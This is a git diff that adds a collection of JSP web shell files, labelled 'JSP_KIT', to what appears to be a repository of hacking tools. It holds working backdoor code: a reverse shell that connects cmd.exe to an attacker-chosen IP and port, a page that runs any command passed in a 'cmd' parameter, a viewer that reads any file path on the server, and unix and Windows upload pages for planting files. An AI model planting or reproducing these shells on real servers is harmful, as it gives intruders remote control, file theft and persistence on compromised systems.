+                }
+                catch (Exception ioe)
+
+                try
+                {
+                        if(isr != null) isr.close();
+                        if(osw != null) osw.close();
+                }
+                catch (Exception ioe)
+        }
+}
+%>
+
+
    JSP Backdoor Reverse Shell
    
+
+
    
+IP Address
+
+Port
+
+
+
    
+
    
+
    
+
+<%
+String ipAddress = request.getParameter("ipaddress");
+String ipPort = request.getParameter("port");
+
+if(ipAddress != null && ipPort != null)
+{
+        Socket sock = null;
+        try
+        {
+                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
+
+                Runtime rt = Runtime.getRuntime();
+                Process proc = rt.exec("cmd.exe");
+
+                StreamConnector outputConnector =
+                        new StreamConnector(proc.getInputStream(),
+                                          sock.getOutputStream());
+
+                StreamConnector inputConnector =
+                        new StreamConnector(sock.getInputStream(),
+                                          proc.getOutputStream());
+
+                outputConnector.start();
+                inputConnector.start();
+        }
+        catch(Exception e) 
+}
+%>
+
+
diff --git a/jsp/hackk8/jsp2/list.jsp b/jsp/hackk8/jsp2/list.jsp
new file mode 100644
index 0000000..eb0db3a
--- /dev/null
+++ b/jsp/hackk8/jsp2/list.jsp
@@ -0,0 +1,77 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+//
+// JSP_KIT
+//
+// list.jsp = Directory & File View
+//
+// by: Sierra
+// modified: 27/06/2003
+//
+%>
+<%
+if(request.getParameter("file")==null) {
+	%>
+	
+	
    
+	
+	
+	
    
+	<%
+	}
+%>
+<% //read the file name.
+try { 
+File f = new File(request.getParameter("file"));
+if(f.isDirectory()) {
+	int i;
+	String fname = new String("Unknown");
+	String fcolor = new String("Black");
+	%>
+	
+	
+	<%
+	out.print("Path: " + f.toString() + "
     
    ");
+	File flist[] = f.listFiles();
+	for(i=0; i" + fname.toString() + " " + "( Size: " + flist[i].length() + " bytes)
    \n");
+		}
+	%>
+	    
+	<%
+
+	} else {
+	if(f.canRead() == true) {
+		InputStream in = new FileInputStream(f);
+		ServletOutputStream outs = response.getOutputStream();
+		int left = 0;
+			try {
+			while((left) >= 0 ) {
+				left = in.read(); 
+				outs.write(left);
+				}
+			} catch(IOException ex) {ex.printStackTrace();}
+		outs.flush();
+		outs.close();
+		in.close();	
+		} else {
+		out.print("Can't Read file
    ");
+		}
+	}
+} catch(Exception ex) {ex.printStackTrace();}
+%>
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/up.jsp b/jsp/hackk8/jsp2/up.jsp
new file mode 100644
index 0000000..5df5d0d
--- /dev/null
+++ b/jsp/hackk8/jsp2/up.jsp
@@ -0,0 +1,162 @@
+
+<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
+<%
+//
+// JSP_KIT
+//
+// up.jsp = File Upload (unix)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
+<%!
+public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
+	String boundary = null;
+	Enumeration enum = request.getHeaderNames();
+	while(enum.hasMoreElements()){
+		String header = (String)enum.nextElement();
+		String hvalue = request.getHeader(header);
+		prop.setProperty((header).toLowerCase(),hvalue);
+		if("content-type".equalsIgnoreCase(header) ){
+			int idx = hvalue.lastIndexOf("boundary=");
+			if(idx != -1 ){
+				boundary= hvalue.substring(idx+9 , hvalue.length());
+			}
+		}
+	}
+	return boundary;
+	
+}
+public String getFileName(String secondline){
+	int len = secondline.length();
+	int idx = secondline.lastIndexOf("filename=");
+	if(idx == -1 ) return null;
+	String filename = secondline.substring(idx+10 , len-1);
+	filename = filename.replace('\\','/');
+	idx = filename.lastIndexOf("/");
+	idx = idx + 1;
+	filename = filename.substring( idx );
+	return filename;        
+}
+%>
+<%
+String DPATH = "/tmp/";
+int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
+int MAXSIZE = 10; // 10 Mega Byte
+String boundary = getBoundary(request,prop);
+if(boundary == null ){
+	boundary = prop.getProperty("boundary"); 
+	}else{
+	boundary = "--"+boundary;
+	}
+if(boundary == null ){
+	return;
+	}
+Long contentsize = new Long(prop.getProperty("content-length","0"));
+int c;
+StringWriter st = new StringWriter();
+if(contentsize.longValue() < 1L ){
+	return;
+	} 
+long l = contentsize.longValue() - ROUGHSIZE; 
+int KB = 1024;
+int MB = 1024 * KB;
+int csize = (int)(l / MB);
+if(csize > MAXSIZE ){
+	return;
+	}
+ServletInputStream fin =  request.getInputStream();
+int cn;
+int count=0;
+while((c=fin.read()) != -1 ){
+	if( c == '\r') break;
+	st.write(c);
+	count++;
+	}
+c=fin.read();
+String tboundary = st.getBuffer().toString();
+tboundary=tboundary.trim();
+if(! tboundary.equalsIgnoreCase( boundary) ){
+	return;
+	}
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write(c);
+	}
+c=fin.read();
+String secondline = st.getBuffer().toString();
+String filename  =  getFileName(secondline);
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write( c );
+	}
+c=fin.read();
+
+fin.read(); 
+fin.read();  
+File newfile = null;
+FileOutputStream fout =null; 
+try{
+	if(filename == null) throw new FileNotFoundException("File Name not found");
+	newfile = new File(DPATH+filename); 
+	fout = new FileOutputStream( newfile );
+	}catch(FileNotFoundException fnexp){
+	fin.close();
+	return;
+	}
+
+byte b[] = null;
+while(l > 1024L){
+	b = new byte[1024];
+	fin.read(b,0,1024);
+	fout.write(b);
+	b=null;
+	l -= 1024L;
+	}
+if(l > 0){
+	b = new byte[(int)l];
+	fin.read(b,0,(int)l);
+	fout.write(b);
+	}
+
+
+ByteArrayOutputStream baos = new ByteArrayOutputStream();
+while((c = fin.read()) != -1){
+	baos.write(c);
+	}
+String laststring = baos.toString();
+int idx = laststring.indexOf(boundary);
+b = baos.toByteArray();
+if(idx > 2){
+	fout.write(b,0,idx-2);
+	}else{
+	fout.close();
+	newfile.delete();
+	return;
+	}
+fout.flush();
+fout.close();
+fin.close();
+
+out.println("FileName: " + newfile.getName());
+out.println("FileSize: " + newfile.length());
+
+%>
+
+
+
+        
+
diff --git a/jsp/hackk8/jsp2/win32/cmd_win32.jsp b/jsp/hackk8/jsp2/win32/cmd_win32.jsp
new file mode 100644
index 0000000..21f2bdc
--- /dev/null
+++ b/jsp/hackk8/jsp2/win32/cmd_win32.jsp
@@ -0,0 +1,31 @@
+<%@ page import="java.util.*,java.io.*,java.net.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
    +<%
+if (request.getParameter("cmd") != null) {
+        out.println("Command: " + request.getParameter("cmd") + "\n
    ");
+        Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
+        OutputStream os = p.getOutputStream();
+        InputStream in = p.getInputStream();
+        DataInputStream dis = new DataInputStream(in);
+        String disr = dis.readLine();
+        while ( disr != null ) {
+                out.println(disr); disr = dis.readLine(); }
+        }
+%>
+
    
+
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/win32/up_win32.jsp b/jsp/hackk8/jsp2/win32/up_win32.jsp
new file mode 100644
index 0000000..ff977ac
--- /dev/null
+++ b/jsp/hackk8/jsp2/win32/up_win32.jsp
@@ -0,0 +1,162 @@
+
+<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
+<%
+//
+// JSP_KIT
+//
+// up.jsp = File Upload (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
+<%!
+public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
+	String boundary = null;
+	Enumeration enum = request.getHeaderNames();
+	while(enum.hasMoreElements()){
+		String header = (String)enum.nextElement();
+		String hvalue = request.getHeader(header);
+		prop.setProperty((header).toLowerCase(),hvalue);
+		if("content-type".equalsIgnoreCase(header) ){
+			int idx = hvalue.lastIndexOf("boundary=");
+			if(idx != -1 ){
+				boundary= hvalue.substring(idx+9 , hvalue.length());
+			}
+		}
+	}
+	return boundary;
+	
+}
+public String getFileName(String secondline){
+	int len = secondline.length();
+	int idx = secondline.lastIndexOf("filename=");
+	if(idx == -1 ) return null;
+	String filename = secondline.substring(idx+10 , len-1);
+	filename = filename.replace('\\','/');
+	idx = filename.lastIndexOf("/");
+	idx = idx + 1;
+	filename = filename.substring( idx );
+	return filename;        
+}
+%>
+<%
+String DPATH = "c:\\";
+int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
+int MAXSIZE = 10; // 10 Mega Byte
+String boundary = getBoundary(request,prop);
+if(boundary == null ){
+	boundary = prop.getProperty("boundary"); 
+	}else{
+	boundary = "--"+boundary;
+	}
+if(boundary == null ){
+	return;
+	}
+Long contentsize = new Long(prop.getProperty("content-length","0"));
+int c;
+StringWriter st = new StringWriter();
+if(contentsize.longValue() < 1L ){
+	return;
+	} 
+long l = contentsize.longValue() - ROUGHSIZE; 
+int KB = 1024;
+int MB = 1024 * KB;
+int csize = (int)(l / MB);
+if(csize > MAXSIZE ){
+	return;
+	}
+ServletInputStream fin =  request.getInputStream();
+int cn;
+int count=0;
+while((c=fin.read()) != -1 ){
+	if( c == '\r') break;
+	st.write(c);
+	count++;
+	}
+c=fin.read();
+String tboundary = st.getBuffer().toString();
+tboundary=tboundary.trim();
+if(! tboundary.equalsIgnoreCase( boundary) ){
+	return;
+	}
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write(c);
+	}
+c=fin.read();
+String secondline = st.getBuffer().toString();
+String filename  =  getFileName(secondline);
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write( c );
+	}
+c=fin.read();
+
+fin.read(); 
+fin.read();  
+File newfile = null;
+FileOutputStream fout =null; 
+try{
+	if(filename == null) throw new FileNotFoundException("File Name not found");
+	newfile = new File(DPATH+filename); 
+	fout = new FileOutputStream( newfile );
+	}catch(FileNotFoundException fnexp){
+	fin.close();
+	return;
+	}
+
+byte b[] = null;
+while(l > 1024L){
+	b = new byte[1024];
+	fin.read(b,0,1024);
+	fout.write(b);
+	b=null;
+	l -= 1024L;
+	}
+if(l > 0){
+	b = new byte[(int)l];
+	fin.read(b,0,(int)l);
+	fout.write(b);
+	}
+
+
+ByteArrayOutputStream baos = new ByteArrayOutputStream();
+while((c = fin.read()) != -1){
+	baos.write(c);
+	}
+String laststring = baos.toString();
+int idx = laststring.indexOf(boundary);
+b = baos.toByteArray();
+if(idx > 2){
+	fout.write(b,0,idx-2);
+	}else{
+	fout.close();
+	newfile.delete();
+	return;
+	}
+fout.flush();
+fout.close();
+fin.close();
+
+out.println("FileName: " + newfile.getName());
+out.println("FileSize: " + newfile.length());
+
+%>
+
+
+
+        
+